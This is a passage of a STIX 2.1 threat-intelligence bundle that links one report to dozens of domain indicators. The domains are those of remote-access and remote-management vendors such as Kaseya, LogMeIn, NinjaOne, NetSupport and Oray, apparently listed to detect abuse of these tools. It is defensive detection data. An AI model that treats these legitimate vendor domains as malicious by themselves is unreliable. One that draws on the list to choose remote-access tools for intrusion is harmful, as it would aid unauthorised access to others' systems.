      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76b19c48-7282-5a97-bf6e-d38c938dcf52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a2c883fa-429b-5fc2-bce5-c2f902e93d48"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--82ef1e1f-5b91-585a-a482-6a43ff2be619",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: kaseya.com",
      "pattern": "[domain-name:value = 'kaseya.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd639883-8f66-5fb0-a6fe-47d4c51b737a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--82ef1e1f-5b91-585a-a482-6a43ff2be619"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9ded4283-1369-553b-906e-d294906b965b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: kaseya.net",
      "pattern": "[domain-name:value = 'kaseya.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca5f66a9-2653-5a21-8b07-3f0c51f8c10a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--9ded4283-1369-553b-906e-d294906b965b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d54af651-0f72-5990-9b51-06fcde32ae07",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: kickidler.com",
      "pattern": "[domain-name:value = 'kickidler.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09fba786-6687-579f-9462-a9b82907f623",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d54af651-0f72-5990-9b51-06fcde32ae07"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4a100cde-0785-5281-a204-a3affb082a87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: laplink.com",
      "pattern": "[domain-name:value = 'laplink.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--df01f6c3-0d41-56fb-a8ae-80a6da7f1a91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--4a100cde-0785-5281-a204-a3affb082a87"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8ffc4ce4-c4b1-5424-a2da-80d71becd189",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: level.io",
      "pattern": "[domain-name:value = 'level.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--21197b3c-6132-55b2-9704-9f2eb03f03f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--8ffc4ce4-c4b1-5424-a2da-80d71becd189"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9c9ecf73-007a-5f5a-8a87-6b0446e18e3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: liongard.com",
      "pattern": "[domain-name:value = 'liongard.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4cc4da3e-832c-5b29-990e-96a6811b2f59",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--9c9ecf73-007a-5f5a-8a87-6b0446e18e3c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1eb83dd1-1952-5d35-ac5d-c740be3d758b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: litemanager.com",
      "pattern": "[domain-name:value = 'litemanager.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88b673ad-a27c-5b9a-86db-4d76e1d49ea0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--1eb83dd1-1952-5d35-ac5d-c740be3d758b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9dd1bada-19fb-56f5-ab21-daffa4ab14a9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: litemanager.ru",
      "pattern": "[domain-name:value = 'litemanager.ru']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c37680cf-0b52-50c1-8e1f-d83ed1b45c03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--9dd1bada-19fb-56f5-ab21-daffa4ab14a9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f285062f-5e2e-5856-ae83-108e5983d10a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: logicnow.com",
      "pattern": "[domain-name:value = 'logicnow.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56108d04-46a2-5e1b-a107-6859496ba23b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f285062f-5e2e-5856-ae83-108e5983d10a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a4b16029-8c34-5857-a9f9-919ca2f1bb3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: logmein-gateway.com",
      "pattern": "[domain-name:value = 'logmein-gateway.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d99e11a7-ac03-59e3-ac90-caf153659f07",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a4b16029-8c34-5857-a9f9-919ca2f1bb3b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--acef0f62-152a-58b0-8130-44fd9c521bb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: logmein.com",
      "pattern": "[domain-name:value = 'logmein.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d2965f0-9c01-57ca-8c54-5ed6da3b7231",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--acef0f62-152a-58b0-8130-44fd9c521bb3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f7e2eafd-8c2a-5073-97f7-28137361f8bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: logmeininc.com",
      "pattern": "[domain-name:value = 'logmeininc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae3112cc-9cba-5642-bc84-65416b2c7310",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f7e2eafd-8c2a-5073-97f7-28137361f8bd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0be78899-1c52-50e9-b348-034acc3ab264",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: logmeinrescue.com",
      "pattern": "[domain-name:value = 'logmeinrescue.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6e565c3-a755-55dd-a07e-8b46b9e0673f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0be78899-1c52-50e9-b348-034acc3ab264"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a5d165de-4065-52bd-97e4-ce7d2c9fd32a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: logmeinrescue.eu",
      "pattern": "[domain-name:value = 'logmeinrescue.eu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--74ca666a-416f-5b26-b0d0-e385c06f3e73",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a5d165de-4065-52bd-97e4-ce7d2c9fd32a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aa831bcc-f22f-5580-a39d-cb0682f66a1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: lunixar.com",
      "pattern": "[domain-name:value = 'lunixar.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5af4089d-4729-5935-9666-d12f67c62133",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--aa831bcc-f22f-5580-a39d-cb0682f66a1c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--46bf1565-1ef2-5b42-8d2d-56b0589ddf10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: meshcentral.com",
      "pattern": "[domain-name:value = 'meshcentral.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ddb01256-a8e3-5d28-9227-dc5d4c156fa6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--46bf1565-1ef2-5b42-8d2d-56b0589ddf10"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f6a5ece1-28d6-5426-bbd5-d4084621105d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mikogo.com",
      "pattern": "[domain-name:value = 'mikogo.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f3dcdf9e-1a1e-5b74-aaef-1b96054d79a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f6a5ece1-28d6-5426-bbd5-d4084621105d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--019dacf8-c8e3-525e-82b9-a59020ca51b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mikogo4.com",
      "pattern": "[domain-name:value = 'mikogo4.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78a4279f-2c4c-562c-8bf0-3d08e7499df2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--019dacf8-c8e3-525e-82b9-a59020ca51b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--24a80700-7c3e-5909-b077-e510495d679f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: miradore.com",
      "pattern": "[domain-name:value = 'miradore.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d66ebc79-2324-5c66-b26e-5137bd5c137b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--24a80700-7c3e-5909-b077-e510495d679f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a1d58931-e853-5270-9f02-5d9d726f613f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: msp360.com",
      "pattern": "[domain-name:value = 'msp360.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c07c7534-0cd9-51f0-ac15-f316f935d6cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a1d58931-e853-5270-9f02-5d9d726f613f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1ae91d79-8dcf-5f72-8317-a1769acbb9c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mygreenpc.com",
      "pattern": "[domain-name:value = 'mygreenpc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c067d317-9569-56e1-9cb6-8760863eb9ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--1ae91d79-8dcf-5f72-8317-a1769acbb9c9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--22d3559c-be14-515b-bc86-267c764b7af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: n-able.com",
      "pattern": "[domain-name:value = 'n-able.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e312c4b-9c7e-5d3a-ab84-1c886519a509",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--22d3559c-be14-515b-bc86-267c764b7af7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a8ef55dc-79d1-589c-a4f9-d139f13bb926",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: naverisk.com",
      "pattern": "[domain-name:value = 'naverisk.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46c08d4d-378f-5e18-bd91-955b8149c192",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a8ef55dc-79d1-589c-a4f9-d139f13bb926"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fd0e96cb-1d43-5be2-845d-68992464fc38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: nchuser.com",
      "pattern": "[domain-name:value = 'nchuser.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e76b58e-75df-5b0d-889f-1ca77d3036f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--fd0e96cb-1d43-5be2-845d-68992464fc38"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--48b876b6-5cdc-54de-93c1-429f1befae54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: netop.com",
      "pattern": "[domain-name:value = 'netop.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ddf2ef51-e7d2-528c-92a9-af53f3a795c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--48b876b6-5cdc-54de-93c1-429f1befae54"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a18cc4c2-6a6d-5190-a71a-b3d963d41703",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: netsupportmanager.com",
      "pattern": "[domain-name:value = 'netsupportmanager.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92567ea3-09f9-52d8-b666-59117c264bc4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a18cc4c2-6a6d-5190-a71a-b3d963d41703"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8b4ada23-7fb0-5602-9f78-2f2b0137334d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: netsupportsoftware.com",
      "pattern": "[domain-name:value = 'netsupportsoftware.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b64f15e-0aa7-5e57-9dfc-908fe652b29d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--8b4ada23-7fb0-5602-9f78-2f2b0137334d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6e98b863-4a4d-5ade-8f8a-73ec9b5a20b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: netviewer.com",
      "pattern": "[domain-name:value = 'netviewer.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b8b54fb-1049-5c00-a165-94a73d9f9288",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6e98b863-4a4d-5ade-8f8a-73ec9b5a20b5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fdf88142-5930-526d-9c4d-25ad2197599b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ninjaone.com",
      "pattern": "[domain-name:value = 'ninjaone.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b67a3f80-395d-5638-b4c3-ef3c8ca21ce2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--fdf88142-5930-526d-9c4d-25ad2197599b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d28edf2c-e2ba-5191-8dc4-5b3e6563865a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ninjarmm.com",
      "pattern": "[domain-name:value = 'ninjarmm.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7c567a11-2385-5792-95be-4bfdbc9f8c17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d28edf2c-e2ba-5191-8dc4-5b3e6563865a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0e322e9e-ac39-5eb8-9995-30727b065616",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ninjarmm.net",
      "pattern": "[domain-name:value = 'ninjarmm.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7794511-23e8-5171-a8c2-5a0cff42c741",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0e322e9e-ac39-5eb8-9995-30727b065616"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5e53a780-206c-5435-8cc5-716d7c50854e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: nomachine.com",
      "pattern": "[domain-name:value = 'nomachine.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5cfb3a4f-20da-57d2-966b-44bfd96a94c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--5e53a780-206c-5435-8cc5-716d7c50854e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--76b098cd-a8c8-5b4f-be9c-6488f16ae65f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ntrsupport.com",
      "pattern": "[domain-name:value = 'ntrsupport.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f30d2ee8-2a14-537f-b16a-1580e6f6667a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--76b098cd-a8c8-5b4f-be9c-6488f16ae65f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--19394f33-f4b9-5a2b-b86c-288866f0e01f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: opti-tune.com",
      "pattern": "[domain-name:value = 'opti-tune.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1264198-7f4c-5acf-a794-345daa717f20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--19394f33-f4b9-5a2b-b86c-288866f0e01f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7d8b56e9-67d7-5b7e-a240-2f601955c122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: optitune.us",
      "pattern": "[domain-name:value = 'optitune.us']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9206154a-30dc-5704-9f22-e86a842d5a8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--7d8b56e9-67d7-5b7e-a240-2f601955c122"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--07b76699-abbb-53fb-b8a4-da0872f8e186",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: oray.com",
      "pattern": "[domain-name:value = 'oray.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb183e07-0d47-5e0f-adcb-bd29429c2214",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--07b76699-abbb-53fb-b8a4-da0872f8e186"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--960976be-c55b-5605-b6a2-b30ca4c76e10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: oray.net",
      "pattern": "[domain-name:value = 'oray.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7dd7da7-c789-5918-b0ab-6eb353450c13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--960976be-c55b-5605-b6a2-b30ca4c76e10"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cbd4b323-7c98-5178-9d31-8c948787412c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: panorama9.com",
      "pattern": "[domain-name:value = 'panorama9.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d33c7c9a-4486-52b0-8e4d-5219a6471f7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--cbd4b323-7c98-5178-9d31-8c948787412c"
